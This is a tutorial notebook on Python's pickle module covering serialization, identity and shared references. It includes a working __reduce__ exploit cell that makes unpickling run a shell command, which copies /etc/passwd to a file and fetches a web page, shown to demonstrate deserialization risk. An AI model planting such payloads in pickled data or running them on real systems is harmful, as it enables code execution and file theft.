### Pickling

The *pickle* Module
- Is Python-specific
- Is a way to represent an object in a persistent form -> for storage on disk or for transmission
  - Creating an object's representation -> serializing
  - Reloading an object from that representation -> deserializing

Serializing and deserializing together are called data marshalling or object marshalling

By default, pickle uses a binary serialization format
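To see what "binary by default" means in practice, here is a small sketch comparing the default protocol with protocol 0, which the pickle documentation describes as the original "human-readable" protocol. The sample dictionary is made up for illustration.

```python
import pickle

data = {'a': 100, 'b': [1, 2, 3]}

# Default protocol: a binary format. Protocols 2 and up start with
# the PROTO opcode (0x80) followed by the protocol number.
binary = pickle.dumps(data)
print(type(binary), binary[:2])

# Protocol 0 is the original ASCII-based protocol
text_like = pickle.dumps(data, protocol=0)
print(text_like.isascii())  # True for this data

# Both forms round-trip to an equal object
assert pickle.loads(binary) == data
assert pickle.loads(text_like) == data
```

Either way the result of dumps is a bytes object; only the encoding inside it differs.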

As previously mentioned, we will focus on dictionaries, but pickling works on other object types as well!

#### Danger Zone!

Unpickling (deserializing) can execute arbitrary code
- not safe!

**Only unpickle data you trust**

#### Usage

We import the pickle module

In [1]:
import pickle

This gives us a function called dump
- dump pickles an object to a file

We also have load
- load unpickles an object from a file

We also have the dumps function, which is the same as dump, but instead of writing to a file it returns the pickled representation as a bytes object
- It can be stored in a variable, saved to a file, sent over a network, etc.

And there is loads, which, like above, is the same as load, but instead of reading from a file it takes a bytes-like object
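The four functions pair up as in-memory (dumps/loads) and file-based (dump/load). A minimal sketch of both round trips; the temporary directory and the file name data.pkl are just for illustration. Note that the file must be opened in binary mode ('wb' / 'rb').

```python
import os
import pickle
import tempfile

data = {'a': 100, 'b': [1, 2, 3]}

# dumps / loads: work with bytes in memory
ser = pickle.dumps(data)
print(type(ser))  # <class 'bytes'>
assert pickle.loads(ser) == data

# dump / load: work with a file opened in binary mode
with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, 'data.pkl')  # hypothetical file name
    with open(path, 'wb') as f:
        pickle.dump(data, f)
    with open(path, 'rb') as f:
        loaded = pickle.load(f)

print(loaded == data, loaded is data)  # True False
```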

#### Equality and Identity

You know the difference between equality and identity. 

If you take a dictionary, pickle it, and then unpickle it, the new dict is equal to the original but is a different object

In [None]:
dict1 = {'a': 1, 'b': 2}
dict2 = pickle.loads(pickle.dumps(dict1))
dict1 == dict2  # True
dict1 is dict2  # False

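So custom classes have to implement \_\_eq\_\_ if we want an unpickled object to compare equal to the original; without it, == falls back to identity, and the unpickled copy is never the same object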
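A small sketch of the difference \_\_eq\_\_ makes after a round trip. The classes Plain and WithEq are hypothetical, and, like any pickled class, they must be defined at module level so pickle can find them again by name when loading.

```python
import pickle


class Plain:
    def __init__(self, x):
        self.x = x


class WithEq:
    def __init__(self, x):
        self.x = x

    def __eq__(self, other):
        # Compare by value; defer to Python for unrelated types
        if not isinstance(other, WithEq):
            return NotImplemented
        return self.x == other.x


p = Plain(1)
q = WithEq(1)
p_copy = pickle.loads(pickle.dumps(p))
q_copy = pickle.loads(pickle.dumps(q))

print(p == p_copy)  # False: default equality is identity
print(q == q_copy)  # True: value-based __eq__
```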

Another note: within a single pickling operation (one dump or dumps call), Python will not re-serialize an object it has already serialized; later occurrences are stored as references to the first one
- Recursive objects can be pickled
- Shared objects are deserialized as shared objects as well
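Both consequences can be checked directly. A minimal sketch: a list that contains itself, and a dictionary that holds two references to the same inner list.

```python
import pickle

# A recursive object: a list that contains itself
lst = [1, 2]
lst.append(lst)
lst_copy = pickle.loads(pickle.dumps(lst))
print(lst_copy[2] is lst_copy)  # True: the self-reference is restored

# A shared object: two keys referring to the same inner list
inner = [10, 20]
outer = {'p': inner, 'q': inner}
restored = pickle.loads(pickle.dumps(outer))
print(restored['p'] is restored['q'])  # True: still one shared object
print(restored['p'] is inner)          # False: but a new object
```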

#### Code Examples

In [2]:
import os
import pickle

In [9]:
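class Exploit:
    # pickle calls __reduce__ to learn how to rebuild the object;
    # here it says "rebuild me by calling os.system(<command>)"
    def __reduce__(self):
        return (os.system, ("cat /etc/passwd > exploit.txt && curl www.google.com >> exploit.txt",))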

In [10]:
def serialize_exploit(fname):
    with open(fname, 'wb') as f:
        pickle.dump(Exploit(), f)

In [11]:
serialize_exploit('loadme')

In [12]:
import pickle
pickle.load(open('loadme', 'rb'))

1

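Now an exploit.txt file exists in the directory: simply loading the pickle ran the shell command (the 1 above is the value returned by os.system)

The point is to be very, very careful about what you unpickle!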
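The pickle documentation describes one way to narrow what a pickle may load: subclass pickle.Unpickler and override find_class, which is called whenever the data refers to a class or function by name. A minimal sketch, assuming a hypothetical allow-list for this application; it blocks the exploit above, but it is a mitigation, not a reason to start trusting arbitrary pickles.

```python
import io
import os
import pickle


class Exploit:
    # Same trick as above, but with a harmless command
    def __reduce__(self):
        return (os.system, ('echo this should never run',))


class RestrictedUnpickler(pickle.Unpickler):
    # Hypothetical allow-list of (module, name) globals this app trusts
    ALLOWED = {('builtins', 'complex'), ('datetime', 'datetime')}

    def find_class(self, module, name):
        # Called for every class/function reference in the pickle
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f'global {module}.{name} is forbidden')


def restricted_loads(data):
    """Like pickle.loads, but only resolves allow-listed globals."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


# Allowed data still round-trips
print(restricted_loads(pickle.dumps({'x': 1 + 1j})))

# The exploit is rejected before os.system is ever looked up
try:
    restricted_loads(pickle.dumps(Exploit()))
except pickle.UnpicklingError as exc:
    print('blocked:', exc)
```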

In [13]:
import pickle

In [14]:
ser = pickle.dumps('Python Pickle Peppers')

In [15]:
ser

b'\x80\x03X\x15\x00\x00\x00Python Pickle Peppersq\x00.'

In [16]:
deser = pickle.loads(ser)

In [17]:
deser

'Python Pickle Peppers'

In [18]:
ser = pickle.dumps(3.14)

In [19]:
ser

b'\x80\x03G@\t\x1e\xb8Q\xeb\x85\x1f.'

In [20]:
deser = pickle.loads(ser)

In [21]:
deser

3.14

In [22]:
d = [10, 20, ('a', 'b', 30)]

In [23]:
ser = pickle.dumps(d)

In [24]:
ser

b'\x80\x03]q\x00(K\nK\x14X\x01\x00\x00\x00aq\x01X\x01\x00\x00\x00bq\x02K\x1e\x87q\x03e.'

In [25]:
deser = pickle.loads(ser)

In [26]:
deser

[10, 20, ('a', 'b', 30)]

In [27]:
id(d)

1648589842312

In [28]:
id(deser)

1648589192904

In [29]:
d == deser

True

In [30]:
s = {'a', 'b', 'x', 10}
ser = pickle.dumps(s)
deser = pickle.loads(ser)
print(id(s), s)
print(id(deser), deser)

1648589571688 {'a', 'x', 10, 'b'}
1648589571464 {'a', 'x', 10, 'b'}


In [31]:
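from datetime import datetime
d = {
    'a': 100,
    'b': [1, 2, 3],
    'c': (1, 2, 3),
    # utcnow() is deprecated since Python 3.12; datetime.now(timezone.utc) is the suggested replacement
    'd': {'x': 1 + 1j, 'y': datetime.utcnow()}}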

In [32]:
ser = pickle.dumps(d)

In [33]:
ser

b'\x80\x03}q\x00(X\x01\x00\x00\x00aq\x01KdX\x01\x00\x00\x00bq\x02]q\x03(K\x01K\x02K\x03eX\x01\x00\x00\x00cq\x04K\x01K\x02K\x03\x87q\x05X\x01\x00\x00\x00dq\x06}q\x07(X\x01\x00\x00\x00xq\x08cbuiltins\ncomplex\nq\tG?\xf0\x00\x00\x00\x00\x00\x00G?\xf0\x00\x00\x00\x00\x00\x00\x86q\nRq\x0bX\x01\x00\x00\x00yq\x0ccdatetime\ndatetime\nq\rC\n\x07\xe4\x0b\r\x15\x0c\r\x01Dyq\x0e\x85q\x0fRq\x10uu.'
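Notice the cbuiltins\ncomplex and cdatetime\ndatetime pieces in the bytes above: pickle records classes by module and name rather than by their code, and looks them up again when loading, so the class has to be importable wherever you unpickle. A small sketch that checks this for two standard-library types (the values are arbitrary):

```python
import pickle
from datetime import datetime
from fractions import Fraction

obj = {'when': datetime(2020, 11, 13, 21, 12, 13), 'ratio': Fraction(1, 3)}
ser = pickle.dumps(obj)

# Module and class names appear in the pickled bytes
print(b'datetime' in ser, b'fractions' in ser, b'Fraction' in ser)

# Loading imports those modules and rebuilds equal objects
print(pickle.loads(ser) == obj)
```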

In [35]:
deser = pickle.loads(ser)

In [36]:
deser

{'a': 100,
 'b': [1, 2, 3],
 'c': (1, 2, 3),
 'd': {'x': (1+1j), 'y': datetime.datetime(2020, 11, 13, 21, 12, 13, 83065)}}

In [37]:
deser == d

True

In [38]:
deser is d

False

In [39]:
d1 = {'a': 10, 'b': 20}
d2 = {'x': 100, 'y': d1}

In [40]:
ser = pickle.dumps(d2)

In [41]:
d3 = pickle.loads(ser)

In [42]:
d3

{'x': 100, 'y': {'a': 10, 'b': 20}}

In [43]:
d3['y'] == d2['y']

True

In [44]:
d3['y'] is d2['y']

False

In [45]:
d2['y'] is d1

True

Interesting: d2['y'] is still the original d1, but the unpickled d3['y'] is a new, equal dictionary

In [46]:
d1 = {'a': 1, 'b': 2}
d2 = {'x': 100, 'y': d1, 'z': d1}

In [47]:
d2['y'] is d2['z']

True

In [48]:
ser = pickle.dumps(d2)

In [49]:
deser = pickle.loads(ser)

In [50]:
deser

{'x': 100, 'y': {'a': 1, 'b': 2}, 'z': {'a': 1, 'b': 2}}

In [51]:
deser['y'] is deser['z']

True

In [52]:
d1 = {'a': 1, 'b': 2}
d2 = {'x': 10, 'y': d1}

In [53]:
d1_ser = pickle.dumps(d1)
d2_ser = pickle.dumps(d2)

In [54]:
del d1
del d2

In [55]:
d1 = pickle.loads(d1_ser)
d2 = pickle.loads(d2_ser)

In [57]:
d1

{'a': 1, 'b': 2}

In [58]:
d2

{'x': 10, 'y': {'a': 1, 'b': 2}}

In [59]:
d2['y'] is d1

False

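This was True before pickling, but it is not anymore: d1 and d2 were pickled separately, so each pickle carries its own copy of the inner dictionary

This is exactly what happens if you pickle the objects, close the program, and later reopen it and load the serialized data back in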

In [60]:
d1['c'] = 3

In [61]:
d2

{'x': 10, 'y': {'a': 1, 'b': 2}}
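If the shared reference needs to survive, one option is to pickle the related objects together in a single dumps call (here, as a tuple), so that pickle sees d1 only once. A sketch contrasting the two approaches:

```python
import pickle

d1 = {'a': 1, 'b': 2}
d2 = {'x': 10, 'y': d1}

# Pickled separately: each pickle holds its own copy of d1's contents
sep_d1 = pickle.loads(pickle.dumps(d1))
sep_d2 = pickle.loads(pickle.dumps(d2))
print(sep_d2['y'] is sep_d1)  # False

# Pickled together: the shared reference is recorded once
new_d1, new_d2 = pickle.loads(pickle.dumps((d1, d2)))
print(new_d2['y'] is new_d1)  # True

new_d1['c'] = 3
print(new_d2)  # {'x': 10, 'y': {'a': 1, 'b': 2, 'c': 3}}
```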

In [62]:
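class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age

    def __eq__(self, other):
        # Compare by value; let Python handle comparisons with other types
        if not isinstance(other, Person):
            return NotImplemented
        return self.name == other.name and self.age == other.age

    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'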

In [63]:
john = Person('John Cleese', 79)
eric = Person('Eric Idle', 75)
michael = Person('Michael Palin', 75)

In [64]:
parrot_sketch = {
    'title': 'Parrot Sketch',
    'actors': [john, michael]
}

ministry_sketch = {
    'title': 'The Ministry of Silly Walks',
    'actors': [john, michael]
}

joke_sketch = {
    'title': 'Funniest Joke in the World',
    'actors': [eric, michael]
}

In [65]:
fan_favorites = {
    'user_1': [parrot_sketch, joke_sketch],
    'user_2': [parrot_sketch, ministry_sketch]
}

In [66]:
from pprint import pprint
pprint(fan_favorites)

{'user_1': [{'actors': [Person(name=John Cleese, age=79),
                        Person(name=Michael Palin, age=75)],
             'title': 'Parrot Sketch'},
            {'actors': [Person(name=Eric Idle, age=75),
                        Person(name=Michael Palin, age=75)],
             'title': 'Funniest Joke in the World'}],
 'user_2': [{'actors': [Person(name=John Cleese, age=79),
                        Person(name=Michael Palin, age=75)],
             'title': 'Parrot Sketch'},
            {'actors': [Person(name=John Cleese, age=79),
                        Person(name=Michael Palin, age=75)],
             'title': 'The Ministry of Silly Walks'}]}


In [67]:
parrot_id_original = id(parrot_sketch)

In [68]:
ser = pickle.dumps(fan_favorites)

In [69]:
ser

b'\x80\x03}q\x00(X\x06\x00\x00\x00user_1q\x01]q\x02(}q\x03(X\x05\x00\x00\x00titleq\x04X\r\x00\x00\x00Parrot Sketchq\x05X\x06\x00\x00\x00actorsq\x06]q\x07(c__main__\nPerson\nq\x08)\x81q\t}q\n(X\x04\x00\x00\x00nameq\x0bX\x0b\x00\x00\x00John Cleeseq\x0cX\x03\x00\x00\x00ageq\rKOubh\x08)\x81q\x0e}q\x0f(h\x0bX\r\x00\x00\x00Michael Palinq\x10h\rKKubeu}q\x11(h\x04X\x1a\x00\x00\x00Funniest Joke in the Worldq\x12h\x06]q\x13(h\x08)\x81q\x14}q\x15(h\x0bX\t\x00\x00\x00Eric Idleq\x16h\rKKubh\x0eeueX\x06\x00\x00\x00user_2q\x17]q\x18(h\x03}q\x19(h\x04X\x1b\x00\x00\x00The Ministry of Silly Walksq\x1ah\x06]q\x1b(h\th\x0eeueu.'

In [70]:
new_fan_favorites = pickle.loads(ser)

In [71]:
pprint(new_fan_favorites)

{'user_1': [{'actors': [Person(name=John Cleese, age=79),
                        Person(name=Michael Palin, age=75)],
             'title': 'Parrot Sketch'},
            {'actors': [Person(name=Eric Idle, age=75),
                        Person(name=Michael Palin, age=75)],
             'title': 'Funniest Joke in the World'}],
 'user_2': [{'actors': [Person(name=John Cleese, age=79),
                        Person(name=Michael Palin, age=75)],
             'title': 'Parrot Sketch'},
            {'actors': [Person(name=John Cleese, age=79),
                        Person(name=Michael Palin, age=75)],
             'title': 'The Ministry of Silly Walks'}]}


In [72]:
fan_favorites == new_fan_favorites

True

In [75]:
id(fan_favorites['user_1'][0]), id(fan_favorites['user_2'][0])

(1648589507704, 1648589507704)

In [76]:
id(new_fan_favorites['user_1'][0]), id(new_fan_favorites['user_2'][0])

(1648588610360, 1648588610360)

In [77]:
parrot_id_original

1648589507704
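Comparing id values shows the sharing only indirectly. A sketch of the same check using is, which also covers the Person instances shared between sketches; the class and data here are a trimmed-down, hypothetical stand-in for the ones above.

```python
import pickle


class Person:
    # Trimmed-down stand-in for the Person class above
    def __init__(self, name, age):
        self.name = name
        self.age = age


michael = Person('Michael Palin', 75)
parrot = {'title': 'Parrot Sketch', 'actors': [michael]}
joke = {'title': 'Funniest Joke in the World', 'actors': [michael]}
favorites = {'user_1': [parrot, joke], 'user_2': [parrot]}

new = pickle.loads(pickle.dumps(favorites))

# The sketch shared by both users is still a single object...
print(new['user_1'][0] is new['user_2'][0])  # True
# ...and so is the Person shared by both sketches
print(new['user_1'][0]['actors'][0] is new['user_1'][1]['actors'][0])  # True
# ...but none of them is the original object
print(new['user_1'][0] is parrot)  # False
```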